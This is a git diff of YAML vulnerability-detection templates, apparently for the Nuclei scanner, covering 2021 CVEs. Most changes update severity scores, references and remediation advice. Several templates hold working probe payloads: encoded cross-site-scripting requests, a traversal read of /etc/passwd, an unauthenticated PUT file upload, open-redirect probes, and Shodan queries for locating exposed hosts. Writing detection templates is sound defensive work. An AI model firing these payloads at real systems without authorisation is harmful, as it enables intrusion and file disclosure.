+  description: Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
   reference:
     - https://github.com/varun-suresh/Clustering/issues/12
     - https://nvd.nist.gov/vuln/detail/CVE-2021-43496
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-43496
     cwe-id: CWE-22
diff --git a/cves/2021/CVE-2021-43574.yaml b/cves/2021/CVE-2021-43574.yaml
new file mode 100644
index 0000000000..d1bfc6aaba
--- /dev/null
+++ b/cves/2021/CVE-2021-43574.yaml
@@ -0,0 +1,49 @@
+id: CVE-2021-43574
+
+info:
+  name: Atmail 6.5.0 - Cross-Site Scripting
+  author: arafatansari,ritikchaddha
+  severity: medium
+  description: |
+    Atmail 6.5.0 contains a cross-site scripting vulnerability in WebAdmin Control Pane via the format parameter to the default URI, which allows remote attackers to inject arbitrary web script or HTML via the “format” parameter.
+  reference:
+    - https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e
+    - https://help.atmail.com/hc/en-us/sections/115003283988
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-43574
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-43574
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"Powered by Atmail"
+    verified: "true"
+  tags: cve,cve2021,atmail,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+      - "{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+      - "{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script>" does not exist'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 500
+          - 403
+        condition: or
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2021/CVE-2021-43734.yaml b/cves/2021/CVE-2021-43734.yaml
new file mode 100644
index 0000000000..e8347c9cb5
--- /dev/null
+++ b/cves/2021/CVE-2021-43734.yaml
@@ -0,0 +1,35 @@
+id: CVE-2021-43734
+
+info:
+  name: kkFileview v4.0.0 - Directory Traversal
+  author: arafatansari
+  severity: high
+  description: |
+    kkFileview v4.0.0 has arbitrary file read through a directory traversal vulnerability which may lead to sensitive file leak on related host.
+  reference:
+    - https://github.com/kekingcn/kkFileView/issues/304
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-43734
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-43734
+    cwe-id: CWE-22
+  metadata:
+    shodan-query: http.html:"kkFileView"
+    verified: "true"
+  tags: cve,cve2021,kkfileview,traversal
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2021/CVE-2021-43778.yaml b/cves/2021/CVE-2021-43778.yaml
index 9aa5c723bd..0ee2529fb2 100644
--- a/cves/2021/CVE-2021-43778.yaml
+++ b/cves/2021/CVE-2021-43778.yaml
@@ -3,16 +3,19 @@ id: CVE-2021-43778
 info:
   name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.
   author: cckuailong
-  severity: critical
+  severity: high
   description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.
   reference:
     - https://github.com/AK-blank/CVE-2021-43778
     - https://nvd.nist.gov/vuln/detail/CVE-2021-43778
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
-    cvss-score: 9.1
-    cve-id: CVE-2021-43778
+    - https://github.com/pluginsGLPI/barcode/security/advisories/GHSA-2pjh-h828-wcw9
+    - https://github.com/pluginsGLPI/barcode/releases/tag/2.6.1
   remediation: Upgrade to version 2.6.1 or later. Or, as a workaround, delete the `front/send.php` file.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-43778
+    cwe-id: CWE-22
   tags: glpi,cve,cve2021,lfi,plugin,traversal
 
 requests:
diff --git a/cves/2021/CVE-2021-43798.yaml b/cves/2021/CVE-2021-43798.yaml
index a6c447c626..73f3f78b8f 100644
--- a/cves/2021/CVE-2021-43798.yaml
+++ b/cves/2021/CVE-2021-43798.yaml
@@ -4,19 +4,20 @@ info:
   name: Grafana v8.x Arbitrary File Read
   author: z0ne,dhiyaneshDk
   severity: high
-  description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where
-    NAME is the plugin ID for any installed plugin.
+  description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
   reference:
     - https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
     - https://nosec.org/home/detail/4914.html
     - https://github.com/jas502n/Grafana-VulnTips
     - https://nvd.nist.gov/vuln/detail/CVE-2021-43798
+  remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-43798
     cwe-id: CWE-22
-  remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
+  metadata:
+    shodan-query: title:"Grafana"
   tags: cve,cve2021,grafana,lfi
 
 requests:
diff --git a/cves/2021/CVE-2021-43810.yaml b/cves/2021/CVE-2021-43810.yaml
index 9ca23d936e..27ab5a6bbf 100644
--- a/cves/2021/CVE-2021-43810.yaml
+++ b/cves/2021/CVE-2021-43810.yaml
@@ -1,20 +1,21 @@
 id: CVE-2021-43810
 
 info:
-  name: Admidio - Reflected Cross-Site Scripting
+  name: Admidio - Cross-Site Scripting
   author: gy741
   severity: medium
-  description: A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value
-    of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.
+  description: A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.
   reference:
     - https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh
     - https://nvd.nist.gov/vuln/detail/CVE-2021-43810
+    - https://github.com/Admidio/admidio/commit/fcb0609abc1d2f65bc1377866bd678e5d891404b
+    - https://github.com/Admidio/admidio/commit/c043267d362f7813543cc2785119bf3e3e54fe21
+  remediation: Upgrade to version 4.0.12 or later.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-43810
     cwe-id: CWE-79
-  remediation: Upgrade to version 4.0.12 or later.
   tags: cve,cve2021,admidio,xss
 
 requests:
diff --git a/cves/2021/CVE-2021-44077.yaml b/cves/2021/CVE-2021-44077.yaml
index 1e54f414e6..e5f78a77ee 100644
--- a/cves/2021/CVE-2021-44077.yaml
+++ b/cves/2021/CVE-2021-44077.yaml
@@ -10,9 +10,13 @@ info:
     - https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/
     - https://github.com/horizon3ai/CVE-2021-44077
     - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44077
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2021-44077
-  tags: cve,cve2021,cisa,zoho,manageengine,rce
+    cwe-id: CWE-287
+  tags: rce,kev,msf,cve,cve2021,zoho,manageengine
 
 requests:
   - method: GET
@@ -27,4 +31,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2021/CVE-2021-44152.yaml b/cves/2021/CVE-2021-44152.yaml
new file mode 100644
index 0000000000..3195545f0d
--- /dev/null
+++ b/cves/2021/CVE-2021-44152.yaml
@@ -0,0 +1,35 @@
+id: unauth-rlm
+
+info:
+  name: Reprise License Manager 14.2 - Authentication Bypass
+  author: Akincibor
+  severity: critical
+  description: Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44152
+    - https://reprisesoftware.com/admin/rlm-admin-download.php?&euagree=yes
+    - http://packetstormsecurity.com/files/165186/Reprise-License-Manager-14.2-Unauthenticated-Password-Change.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-44152
+    cwe-id: CWE-287
+  tags: unauth,rlm,packetstorm
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/goforms/menu"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "RLM Administration Commands"
+
+# Enhanced by mp on 2022/06/03
diff --git a/cves/2021/CVE-2021-44228.yaml b/cves/2021/CVE-2021-44228.yaml
index 096ebc503b..dd1200ac1a 100644
--- a/cves/2021/CVE-2021-44228.yaml
+++ b/cves/2021/CVE-2021-44228.yaml
@@ -4,21 +4,21 @@ info:
   name: Apache Log4j2 Remote Code Injection
   author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea
   severity: critical
-  description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control
-    log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
+  description: |
+    Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
   reference:
     - https://logging.apache.org/log4j/2.x/security.html
     - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
     - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
     - https://www.lunasec.io/docs/blog/log4j-zero-day/
     - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
+  remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cve-id: CVE-2021-44228
     cwe-id: CWE-502
-  remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
-  tags: cve,cve2021,rce,oast,log4j,injection
+  tags: cve,cve2021,rce,oast,log4j,injection,kev
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-44451.yaml b/cves/2021/CVE-2021-44451.yaml
index 6590c06d92..9ecfb418b6 100644
--- a/cves/2021/CVE-2021-44451.yaml
+++ b/cves/2021/CVE-2021-44451.yaml
@@ -3,17 +3,21 @@ id: CVE-2021-44451
 info:
   name: Apache Superset Default Login
   author: dhiyaneshDK
-  severity: high
+  severity: medium
   description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
   reference:
     - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
     - https://nvd.nist.gov/vuln/detail/CVE-2021-44451
-  classification:
-    cve-id: CVE-2021-44451
+    - https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb
   remediation: Users should upgrade to Apache Superset 1.4.0 or higher.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2021-44451
+    cwe-id: CWE-522
   metadata:
     verified: true
-    shodan-query: title:"Superset"
+    shodan-query: http.favicon.hash:1582430156
   tags: cve,cve2021,apache,superset,default-login
 
 requests:
diff --git a/cves/2021/CVE-2021-44515.yaml b/cves/2021/CVE-2021-44515.yaml
index 1757a0f1f8..fa9faae8c7 100644
--- a/cves/2021/CVE-2021-44515.yaml
+++ b/cves/2021/CVE-2021-44515.yaml
@@ -4,14 +4,20 @@ info:
   name: Zoho ManageEngine Desktop Central - Remote Code Execution
   author: Adam Crosser
   severity: critical
-  description: Zoho Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.
+  description: Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.
   reference:
     - https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog
     - https://srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html
     - https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis
+    - https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44515
+  remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2021-44515
-  tags: cve,cve2021,cisa,zoho,rce,manageengine
+    cwe-id: CWE-287
+  tags: cve,cve2021,zoho,rce,manageengine,kev
 
 requests:
   - raw:
@@ -33,4 +39,6 @@ requests:
       - type: word
         part: header
         words:
-          - "UEMJSESSIONID="
\ No newline at end of file
+          - "UEMJSESSIONID="
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2021/CVE-2021-44521.yaml b/cves/2021/CVE-2021-44521.yaml
index c06f1f19d1..5e9827d39f 100644
--- a/cves/2021/CVE-2021-44521.yaml
+++ b/cves/2021/CVE-2021-44521.yaml
@@ -4,13 +4,12 @@ info:
   name: Apache Cassandra Load UDF RCE
   author: Y4er
   severity: critical
-  description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is
-    possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration
-    is documented as unsafe, and will continue to be considered unsafe after this CVE.'
+  description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.'
   reference:
     - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-44521
     - https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
+    - https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 9.1
diff --git a/cves/2021/CVE-2021-44528.yaml b/cves/2021/CVE-2021-44528.yaml
index 3487533aaf..eb07ead21a 100644
--- a/cves/2021/CVE-2021-44528.yaml
+++ b/cves/2021/CVE-2021-44528.yaml
@@ -8,26 +8,27 @@ info:
   reference:
     - https://seclists.org/oss-sec/2021/q4/att-160/7-0-host-authorzation-open-redirect.patch
     - https://nvd.nist.gov/vuln/detail/CVE-2021-44528
+    - https://github.com/rails/rails/commit/0fccfb9a3097a9c4260c791f1a40b128517e7815
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-44528
     cwe-id: CWE-601
-  tags: cve,cve2021,redirect
+  tags: seclists,cve,cve2021,redirect
 
 requests:
   - raw:
       - |
         GET / HTTP/1.1
         Host: {{Hostname}}
-        X-Forwarded-Host: //example.com
+        X-Forwarded-Host: //interact.sh
 
     matchers-condition: and
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
 
       - type: status
         status:
diff --git a/cves/2021/CVE-2021-44529.yaml b/cves/2021/CVE-2021-44529.yaml
index 409f68bea3..2a56a93b6f 100644
--- a/cves/2021/CVE-2021-44529.yaml
+++ b/cves/2021/CVE-2021-44529.yaml
@@ -4,8 +4,7 @@ info:
   name: Ivanti EPM Cloud Services Appliance Code Injection
   author: duty_1g,phyr3wall,Tirtha
   severity: critical
-  description: Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited
-    permissions (nobody).
+  description: Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).
   reference:
     - https://forums.ivanti.com/s/article/SA-2021-12-02
     - https://twitter.com/Dinosn/status/1505273954478530569
diff --git a/cves/2021/CVE-2021-44848.yaml b/cves/2021/CVE-2021-44848.yaml
index 44e18bfcb9..b174863f6e 100644
--- a/cves/2021/CVE-2021-44848.yaml
+++ b/cves/2021/CVE-2021-44848.yaml
@@ -14,7 +14,7 @@ info:
     cvss-score: 5.3
     cve-id: CVE-2021-44848
     cwe-id: CWE-287
-  tags: cve,cve2021,exposure,thinfinity,virtualui
+  tags: virtualui,tenable,cve,cve2021,exposure,thinfinity
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-45043.yaml b/cves/2021/CVE-2021-45043.yaml
index 407b0f617e..f0787778fa 100644
--- a/cves/2021/CVE-2021-45043.yaml
+++ b/cves/2021/CVE-2021-45043.yaml
@@ -16,8 +16,8 @@ info:
     cve-id: CVE-2021-45043
     cwe-id: CWE-22
   metadata:
-    google-dork: intitle:"HD-Network Real-time Monitoring System V2.0"
-  tags: cve,cve2021,hdnetwork,lfi,iot,camera
+    google-query: intitle:"HD-Network Real-time Monitoring System V2.0"
+  tags: camera,edb,cve,cve2021,hdnetwork,lfi,iot
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-45046.yaml b/cves/2021/CVE-2021-45046.yaml
index 31bf0f5640..25b89adc71 100644
--- a/cves/2021/CVE-2021-45046.yaml
+++ b/cves/2021/CVE-2021-45046.yaml
@@ -9,9 +9,11 @@ info:
     - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/
     - https://twitter.com/marcioalm/status/1471740771581652995
     - https://logging.apache.org/log4j/2.x/
+    - http://www.openwall.com/lists/oss-security/2021/12/14/4
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 9.0
+    cvss-score: 9
     cve-id: CVE-2021-45046
     cwe-id: CWE-502
   tags: cve,cve2021,rce,oast,log4j,injection
diff --git a/cves/2021/CVE-2021-45092.yaml b/cves/2021/CVE-2021-45092.yaml
index 60a13263b4..9b4dd4f9f5 100644
--- a/cves/2021/CVE-2021-45092.yaml
+++ b/cves/2021/CVE-2021-45092.yaml
@@ -14,12 +14,12 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-45092
     cwe-id: CWE-74
-  tags: cve,cve2021,injection,iframe,thinfinity
+  tags: iframe,thinfinity,tenable,cve,cve2021,injection
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/lab.html?vpath=//example.com"
+      - "{{BaseURL}}/lab.html?vpath=//interact.sh"
 
     matchers:
       - type: regex
diff --git a/cves/2021/CVE-2021-45232.yaml b/cves/2021/CVE-2021-45232.yaml
index 954e3ae3d2..b9ba133938 100644
--- a/cves/2021/CVE-2021-45232.yaml
+++ b/cves/2021/CVE-2021-45232.yaml
@@ -4,19 +4,19 @@ info:
   name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access
   author: Mr-xn
   severity: critical
-  description: "In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`,  some API directly use the interface of framework `gin` thus bypassing their authentication."
+  description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`,  some API directly use the interface of framework `gin` thus bypassing their authentication.
   reference:
     - https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
     - https://github.com/pingpongcult/CVE-2021-45232
     - https://github.com/advisories/GHSA-wcxq-f256-53xp
     - https://twitter.com/403Timeout/status/1475715079173976066
     - https://github.com/wuppp/cve-2021-45232-exp
+  remediation: Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-45232
     cwe-id: CWE-306
-  remediation: Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard.
   tags: cve,cve2021,apache,unauth,apisix
 
 requests:
diff --git a/cves/2021/CVE-2021-45380.yaml b/cves/2021/CVE-2021-45380.yaml
index 70cea0b272..f02b9d272e 100644
--- a/cves/2021/CVE-2021-45380.yaml
+++ b/cves/2021/CVE-2021-45380.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-45380
 
 info:
-  name: AppCMS - Reflected Cross-Site Scripting
+  name: AppCMS - Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php.
@@ -13,6 +13,8 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-45380
     cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"Powerd by AppCMS"
   tags: cve,cve2021,appcms,xss
 
 requests:
diff --git a/cves/2021/CVE-2021-45422.yaml b/cves/2021/CVE-2021-45422.yaml
new file mode 100644
index 0000000000..8a428ded25
--- /dev/null
+++ b/cves/2021/CVE-2021-45422.yaml
@@ -0,0 +1,46 @@
+id: CVE-2021-45422
+
+info:
+  name: Reprise License Manager 14.2 - Cross-Site Scripting
+  author: edoardottt
+  severity: medium
+  description: |
+    Reprise License Manager 14.2 contains a cross-site scripting vulnerability in the /goform/activate_process "count" parameter via GET.
+  reference:
+    - https://seclists.org/fulldisclosure/2022/Jan/31
+    - https://www.getinfosec.news/13202933/reprise-license-manager-142-reflected-cross-site-scripting#/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-45422
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-45422
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"Reprise License"
+    verified: "true"
+  tags: cve,cve2021,reprise,xss,seclists
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'value=""><script>alert(document.domain)</script>"><input type='
+          - 'value: "><script>alert(document.domain)</script>)<br>'
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-45428.yaml b/cves/2021/CVE-2021-45428.yaml
new file mode 100644
index 0000000000..ec30ef8f6c
--- /dev/null
+++ b/cves/2021/CVE-2021-45428.yaml
@@ -0,0 +1,48 @@
+id: CVE-2021-45428
+
+info:
+  name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload
+  author: gy741
+  severity: critical
+  description: |
+    TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
+  reference:
+    - https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing
+    - http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-45428
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-45428
+    cwe-id: CWE-639
+  metadata:
+    shodan-query: http.html:"TLR-2005KSH"
+    verified: "true"
+  tags: cve,cve2021,telesquare,intrusive,fileupload,packetstorm
+
+requests:
+  - raw:
+      - |
+        GET /{{randstr}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        PUT /{{randstr}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+        CVE-2021-45428
+
+      - |
+        GET /{{randstr}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 404 && status_code_2 == 201'
+          - 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200'
+        condition: and
+
+# Enhanced by mp on 2022/05/19
diff --git a/cves/2021/CVE-2021-45967.yaml b/cves/2021/CVE-2021-45967.yaml
index 871a80b61d..c8cfdf156a 100644
--- a/cves/2021/CVE-2021-45967.yaml
+++ b/cves/2021/CVE-2021-45967.yaml
@@ -3,12 +3,17 @@ id: CVE-2021-45967
 info:
   name: Pascom CPS Server-Side Request Forgery
   author: dwisiswant0
-  severity: high
+  severity: critical
   description: Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability.
   reference:
     - https://kerbit.io/research/read/blog/4
+    - https://www.pascom.net/doc/en/release-notes/
+    - https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2021-45967
+    cwe-id: CWE-918
   tags: cve,cve2021,pascom,ssrf
 
 requests:
diff --git a/cves/2021/CVE-2021-45968.yaml b/cves/2021/CVE-2021-45968.yaml
index 2dde22d4d5..9467be6081 100644
--- a/cves/2021/CVE-2021-45968.yaml
+++ b/cves/2021/CVE-2021-45968.yaml
@@ -1,14 +1,16 @@
 id: CVE-2021-45968
 
 info:
-  name: Pascom CPS Path Traversal
+  name: Pascom CPS  - Local File Inclusion
   author: dwisiswant0
   severity: high
   description: |
-    Pascom version packaged with Cloud Phone System (CPS)
-    versions before 7.20 contains a known path traversal issue
+    Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability.
   reference:
     - https://kerbit.io/research/read/blog/4
+    - https://www.pascom.net/doc/en/release-notes/
+    - https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-45968
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -35,5 +37,7 @@ requests:
       - type: dsl
         dsl:
           - "status_code_2 != status_code_1"
-          - "contains(body_2, 'pascom GmbH &amp; Co KG') || contains(body_3, 'pascom GmbH &amp; Co KG')" # Verifying CMS
-        condition: and
\ No newline at end of file
+          - "contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')" # Verifying CMS
+        condition: and
+
+# Enhanced by mp on 2022/06/29
